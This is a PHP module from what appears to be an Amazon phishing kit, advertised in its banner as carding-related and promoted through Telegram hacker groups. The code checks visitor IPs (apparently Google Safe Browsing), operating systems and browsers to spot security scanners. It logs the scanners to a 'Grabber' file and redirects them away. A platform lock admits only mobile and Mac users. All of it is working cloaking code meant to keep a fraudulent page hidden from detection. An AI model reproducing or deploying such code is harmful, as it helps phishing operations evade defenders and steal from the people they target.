<?php
//error_reporting(E_ALL ^ E_NOTICE);
/*
██████╗ ██╗  ██╗███████╗    ██████╗ ███████╗ ██████╗██╗  ██╗ █████╗ ██╗  ██╗     ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗██║  ██║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║ ██╔╝██╔══██╗██║  ██║    ██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
██║  ██║███████║█████╗      ██████╔╝█████╗  ██║     █████╔╝ ███████║███████║    ██║     ██║   ██║██║  ██║█████╗  ██║  ██║
██║  ██║██╔══██║██╔══╝      ██╔══██╗██╔══╝  ██║     ██╔═██╗ ██╔══██║██╔══██║    ██║     ██║   ██║██║  ██║██╔══╝  ██║  ██║
██████╔╝██║  ██║███████╗    ██║  ██║███████╗╚██████╗██║  ██╗██║  ██║██║  ██║    ╚██████╗╚██████╔╝██████╔╝███████╗██████╔╝
╚═════╝ ╚═╝  ╚═╝╚══════╝    ╚═╝  ╚═╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝     ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═════╝ 
 * (🧑‍💻)=>DHE RECKAH BOY BORN DEM<=(🧑‍💻)
 * (🧑‍💻)=>OR THEY DON'T TELL YOU <=(🧑‍💻)
 * (🧑‍💻)=>COMMON CARDING FOR DATOR<=(🧑‍💻)
 * Dhe Reckah Amazon Page (MultiFunc)
 * version 1.0.0
 * REMEMBER:                             
 * Facebook fan page is @DheReckahBoy
 * Twitter  fan page is @DheReckahBoy
 * Insta    fan page is @DheReckahBoy
 * youtube  fan page is @DheReckahBoy
 * Telegram fan page is @DheReckahBoy
 * Copycat all reserved @DheReckahBoys
#############################################
#$            Dhe Reckah Coded             #$
#$                  Says:                  #$ 
We All Know The Dangers Of The Internet Users
#$                    &                    #$
#$           As the Internet Exit          #$ 
#$           The dangers exit too          #$  
#############################################
 ================IF AGREED=================
 ==================THEN====================
=Contact Coder On Telegram @DheReckahCoded
=To Be save Join Our Telegram Group
=   @Dhe_ReckahsHackers_Generation
=To Be Secured Join Our Telegram Channel
=   @Dhe_Reckahs_Hackers_Generation

*/


if($ip == "92.23.57.168" or $ip == "96.31.1.4" or $ip == "207.96.148.8") {
$message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows Server 2003/XP x64" and $browser == "Firefox") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows 7" and $browser == "Firefox") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows XP" and $browser == "Firefox") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows XP" and $browser == "Internet Explorer") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows XP" and $browser == "Chrome") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}
if($os == "Windows Vista" and $browser == "Internet Explorer") {
 $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows Vista" or $os == "Ubuntu" or $os == "Chrome OS" or $os == "BlackBerry" or $os == "Linux") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($browser == "Unknown Browser") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($browser == "Internet Explorer") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Windows 2000") {
 $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($os == "Unknown OS Platform") {
  $message = ("Dh3 R3ck4h D3cl!n3d =>  [ G00gl3 S4febr0ws!ng ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
}

if($lock_platform == "on"){
    if($os == "iPhone" or $os == "iPad" or $os == "Android" or $os == "iPod" or $os == "Mac OS X" or $os == "Mac OS 9") {
    }else{
      $message = ("Dh3 R3ck4h D3cl!n3d =>  [ L0ck3d Pl4tf0rm ] :".$_SERVER['HTTP_USER_AGENT']."\n !p : ". $ip." || ".gmdate ("Y-n-d")." ----> ".gmdate ("H:i:s")."\n\n");
        $save=fopen("DheReckahGrabber/DiscoveredBot.txt","a+");
        fwrite($save,$message);
        fclose($save);
            header("Location: ".redirectBot());exit();
    }
}
